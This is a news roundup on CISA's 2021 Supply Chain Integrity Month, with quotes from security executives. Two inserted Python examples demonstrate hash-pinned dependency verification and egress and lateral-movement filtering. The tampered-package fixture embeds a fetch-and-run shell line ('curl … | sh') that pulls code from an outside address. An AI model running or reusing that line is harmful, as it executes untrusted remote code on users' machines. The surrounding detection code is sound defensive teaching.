April is National Supply Chain Integrity Month

April 12, 2021

In recognition of National Supply Chain Integrity Month, the Cybersecurity and Infrastructure Security Agency (CISA) is partnering with the Office of the Director of National Intelligence (ODNI), the Department of Defense, and other government and industry partners to promote a call to action for a unified effort by organizations across the country to strengthen global supply chains.

Information and communications technology (ICT) systems underpin a broad range of critical infrastructure activities that support critical functions within our communities, such as generating electricity, operating hospitals, and supplying clean water. If vulnerabilities in these systems and their critical hardware and software are exploited, the consequences can have cascading impacts across organizations, sectors, and National Critical Functions.

“As the number of sophisticated cyberattacks increases, we’re reminded that supply chain security is not a nice-to-have but an urgent necessity,” said CISA Assistant Director Bob Kolasky. “Government and industry must work together to strengthen and enhance the security and safety of our critical infrastructure and the associated supply chains that support the resilience of our nation.”

Throughout the month of April, CISA will promote resources, tools, and information, including those developed by the public-private ICT SCRM Task Force, to help organizations and agencies integrate SCRM into their overall security posture. CISA themes for each week include:

  • Week 1: Building Collective Supply Chain Resilience
  • Week 2: Assessing ICT Trustworthiness
  • Week 3: Understanding Supply Chain Threats
  • Week 4: Knowing the Essentials

Here's what security executives had to say in honor of National Supply Chain Integrity Month:

Dave Stapleton, CISO, CyberGRX:

“Leadership by the U.S. government is key as these security initiatives will require broad public/private partnership in order to be effective. I think this resonates with our thoughts on the need for a collaborative approach to addressing a global issue like TPCRM. Also, I like the fundamentals that the NCSC recommended: 

  • “Diversify Supply Chains”
  • “Mitigate Third-Party Risks”
  • “Identify and Protect Crown Jewels”
  • “Ensure Executive-Level Commitment”
  • “Strengthen Partnerships””


Jack Mannino, CEO at nVisium:

“Supply chain security will remain a front and center issue for many organizations as the fallout from recent incidents continues to unfold. In addition to traditional software security testing techniques such as code reviews and penetration testing, an increasing number of organizations may be interested in understanding how software behaves through malicious code reviews. These types of tests explore the likelihood that software contains embedded malware, through malicious code commits or by compromised third-party dependencies.”
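The compromised-dependency risk Mannino describes is also where a mechanical integrity check pays off before any human review starts. The script below is an added example, not code from the article, CISA or nVisium: it models hash-pinned lockfile verification (the control that pip enforces with `--require-hashes`, and that other lockfile tooling implements similarly). The package names, artifact bytes and the tampered payload are constructed inline so it runs offline.

```python
"""Verify downloaded dependency artifacts against a hash-pinned lockfile.

Added example (not from the article, CISA or nVisium). Package names and
artifact contents below are constructed; the lockfile format mirrors the
requirements.txt ``--hash=sha256:...`` convention that pip enforces with
``--require-hashes``.
"""
from __future__ import annotations

import hashlib
import hmac
import re

# One pinned requirement per line: name==version --hash=sha256:<64 hex chars>
PIN_RE = re.compile(
    r"^(?P<name>[A-Za-z0-9_.-]+)==(?P<ver>\S+)\s+--hash=sha256:(?P<digest>[0-9a-f]{64})$"
)

# Constructed "known-good" artifacts as captured when the lockfile was generated.
KNOWN_GOOD: dict[str, bytes] = {
    "netlib==1.4.2": b"def fetch(url):\n    return _get(url)\n",
    "parsekit==0.9.0": b"def parse(doc):\n    return _tokens(doc)\n",
}

# Constructed artifacts as served at install time: parsekit carries an appended
# payload (a tampered build), and colorlog was pulled in without any pin.
SUPPLIED: dict[str, bytes] = {
    "netlib==1.4.2": KNOWN_GOOD["netlib==1.4.2"],
    "parsekit==0.9.0": KNOWN_GOOD["parsekit==0.9.0"]
    + b"import os; os.system('curl https://198.51.100.7/x | sh')\n",
    "colorlog==3.0.0": b"def colorize(s):\n    return s\n",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_lockfile(artifacts: dict[str, bytes]) -> str:
    """What a resolver does at lock time: record a digest for every reviewed artifact."""
    lines = [f"{req} --hash=sha256:{sha256_hex(blob)}" for req, blob in sorted(artifacts.items())]
    return "\n".join(lines) + "\n"


def parse_lockfile(text: str) -> dict[str, str]:
    """Map requirement -> expected digest; refuse any line that lacks a hash."""
    pins: dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = PIN_RE.match(line)
        if m is None:
            raise ValueError(f"lockfile line {lineno} is not hash-pinned: {raw!r}")
        pins[f"{m['name']}=={m['ver']}"] = m["digest"]
    return pins


def verify(pins: dict[str, str], supplied: dict[str, bytes]) -> dict[str, str]:
    """Return requirement -> verdict. Anything other than 'ok' must block the install."""
    verdicts: dict[str, str] = {}
    for req, expected in pins.items():
        blob = supplied.get(req)
        if blob is None:
            verdicts[req] = "missing"
            continue
        actual = sha256_hex(blob)
        # constant-time compare out of habit; the digests themselves are not secret
        verdicts[req] = "ok" if hmac.compare_digest(actual, expected) else "hash-mismatch"
    for req in supplied:
        if req not in pins:
            verdicts[req] = "unpinned"  # transitive or injected dependency nobody reviewed
    return verdicts


def audit() -> dict[str, str]:
    """Lock against the reviewed artifacts, then check what the installer actually fetched."""
    return verify(parse_lockfile(build_lockfile(KNOWN_GOOD)), SUPPLIED)


if __name__ == "__main__":
    for req, verdict in sorted(audit().items()):
        print(f"{verdict:14} {req}")
```

The check fails closed on three distinct conditions: a pinned artifact whose bytes changed, a pinned artifact that never arrived, and an artifact that arrived without a pin. The third case is the one most installers silently accept, and it is exactly how an unreviewed transitive dependency reaches production.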

 

Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber:

“When a third-party tool is used to breach a business it is usually only a foot in the door. The real damage occurs if the internal systems are also vulnerable and exploitable. Never trust a single layer of protection. Remediate vulnerabilities as quickly as possible and double check that patches are being applied and mitigating actions are being taken. Considering the massive growth and scale of digital systems, and the exponential increase of vulnerabilities every year, this isn’t an easy job but it is possible to succeed.”

 

Vishal Jain, Co-Founder and CTO at Valtix:

“The need for securing supply chains has been accelerated by Covid and by enterprises accelerating their digital transformation. Enterprise Infosec teams need to maintain proper checks and balances when exposing their internal valuable assets, aka the keys to the kingdom, to supply-chain vendors and 3rd party services. We have seen too many times in the past, SunBurst from SolarWinds being a recent one, that an attacker enters the front gate of the organization by exploiting some vulnerability in their supply chain vendor. Once those assets get infected, malware can move laterally via the network and eventually to the crown jewel holding critical data. Malware on the crown jewel connects to the command-and-control center and exfiltrates critical data out to the hacker.


Enterprises need to follow a layered defense approach to protect their assets when a breach occurs via supply chain vendor. They need to have zero-trust security built in with necessary controls to prevent lateral movement of threats (to reduce the blast radius) and egress filtering to prevent data exfiltration. Enterprises also need to evaluate moving to Cloud based services. Cloud is more secure than their on-prem data center when appropriate cloud security controls are in place. Enterprises also need to ensure that supply chain vendors they use follow the best security practices.”
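Jain's two controls, blocking lateral movement and filtering egress, can be expressed as a policy evaluated over connection records. The script below is an added example, not from the article or Valtix: the address plan, ports, allowlist and flow log lines are all constructed for illustration, and the rule set is a deliberately simplified stand-in for a real segmentation and egress policy. It shows how the attack chain in the quote (foothold, lateral move on an admin port, outbound connection to an unlisted host) turns into deny verdicts instead of silent traffic.

```python
"""Evaluate connection records against a segmentation and egress policy.

Added example (not from the article or Valtix). Network ranges, ports and
flow records are constructed; the policy is a simplified stand-in for a real
zero-trust rule set.
"""
from __future__ import annotations

import ipaddress
from ipaddress import IPv4Address, IPv4Network

# Constructed address plan.
INTERNAL = IPv4Network("10.20.0.0/16")          # everything on-prem
ADMIN_SEGMENT = IPv4Network("10.20.3.0/24")     # jump hosts allowed to use admin ports
LATERAL_PORTS = {22, 445, 3389, 5985}           # SSH, SMB, RDP, WinRM
EGRESS_ALLOW = [IPv4Network("52.96.0.0/24")]    # approved update/SaaS endpoints
EXFIL_BYTES = 100 * 1024 * 1024                 # flag any single outbound flow above 100 MiB

# Constructed flow records: time src dst dport bytes_out
FLOWS = """\
2021-04-12T10:00:01Z 10.20.1.15 10.20.1.40 445 2048
2021-04-12T10:00:05Z 10.20.1.15 52.96.0.10 443 5120
2021-04-12T10:00:09Z 10.20.1.15 10.20.2.7 3389 1200
2021-04-12T10:00:13Z 10.20.1.15 198.51.100.23 443 734003200
2021-04-12T10:00:20Z 10.20.3.9 10.20.3.10 22 900
2021-04-12T10:00:25Z 10.20.1.15 52.96.0.10 443 734003200
"""


def classify(src: IPv4Address, dst: IPv4Address, dport: int, nbytes: int) -> str:
    """Return a verdict; 'deny:' verdicts are what the enforcement point blocks."""
    if dst in INTERNAL:
        # east-west: admin protocols only from the admin segment
        if dport in LATERAL_PORTS and src not in ADMIN_SEGMENT:
            return "deny:lateral-admin-port"
        return "allow:internal"
    # north-south: default deny, explicit allowlist
    if not any(dst in net for net in EGRESS_ALLOW):
        return "deny:egress-unlisted"
    if nbytes >= EXFIL_BYTES:
        # listed destination, but a volume no workstation should push in one flow
        return "alert:egress-volume"
    return "allow:egress-listed"


def evaluate(log_text: str) -> list[tuple[str, str, str, int, str]]:
    """Parse each record and attach its verdict."""
    out = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, nbytes = line.split()
        verdict = classify(
            ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport), int(nbytes)
        )
        out.append((ts, src, dst, int(dport), verdict))
    return out


def denied(log_text: str) -> list[tuple[str, str, str, int, str]]:
    """Only the records a zero-trust enforcement point would block or escalate."""
    return [r for r in evaluate(log_text) if not r[4].startswith("allow:")]


if __name__ == "__main__":
    for ts, src, dst, dport, verdict in evaluate(FLOWS):
        print(f"{ts} {src:>14} -> {dst:>15}:{dport:<5} {verdict}")
```

The last record is the caveat worth noticing: an allowlisted destination is not proof of benign traffic, so the policy still raises an alert on an abnormal volume to a listed host. In practice the thresholds and segments come from the asset tiering Hellickson describes below, not from a hard-coded constant.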

 

John Hellickson, CxO Advisor, Cyber Strategy at Coalfire:

“The topic of supply chain security is often more important than we as an industry give it credit for. That holds until the organization is impacted by a supplier, until they themselves are the supplier who has impacted their customers, or until a serious event occurs across a given sector that raises concerns by executives or the Board about whether they were also impacted. There are a lot of elements of a highly mature program which could be daunting when building a program from scratch; however, the larger the organization, the more likely there will be elements of existing risk management practices in place that one could build upon.

A decent supply chain risk program would include elements of Enterprise Risk, Third Party Risk, Cyber Risk, Business Continuity and Physical Security, and a leader in this space would need to also partner with procurement and product teams. When performing discovery & analysis on what is critical to the business, often informed by Business Impact Analyses (BIAs) performed within Business Continuity programs, it is important to tier vendors & suppliers accordingly. When it comes to suppliers, understanding threats facing supply chains is key. Threats such as physical tampering, inadvertent use of sensitive data, IP theft / piracy, theft / inventory manipulation, and remote infrastructure access are examples that could have an impact on supply chain risk. 

When performing due diligence and risk assessments on suppliers & vendors, it has become more relevant to leverage senior cybersecurity resources such as security architects & engineers to participate in more technical assessments of embedded systems that could be exploited within the supply chain. The type of skills these engineers/architects bring can complement the traditional auditors that are often tied to Governance, Risk and Compliance functions of an organization.

Overall, for many organizations, supply chain security should be a specific topic within enterprise risk committees, while having a dedicated focus within the organization.”

 

Joseph Carson, chief security scientist and Advisory CISO at Thycotic:

“Organizations have less control and visibility over the actual security that supply chains have put in place. For the most part, this tends to only be covered in legal contracts, rather than a true security risk assessment. Organizations must prioritize privileged access security to reduce the risks exposed in their supply chain security.”


Michael Isbitski, Technical Evangelist at Salt Security:

“No longer can organizations delay patching critical, known vulnerabilities because of concerns over outages, the impact on production users, or the loss of oversight of a system. Unpatched systems are leaving important elements of the IT stack vulnerable, especially APIs, which attackers are increasingly targeting these days since they route traffic directly to valuable data and services.

There may be many cloud services (and in turn, APIs and data) that an organization is unaware of. These may be used by their own employees or in turn the partners they work with. We hear a lot about this expansion of partner ecosystems and concerns over the digital supply chain.”

 

KEYWORDS: CISA, critical infrastructure, cyber security, risk management, supply chain
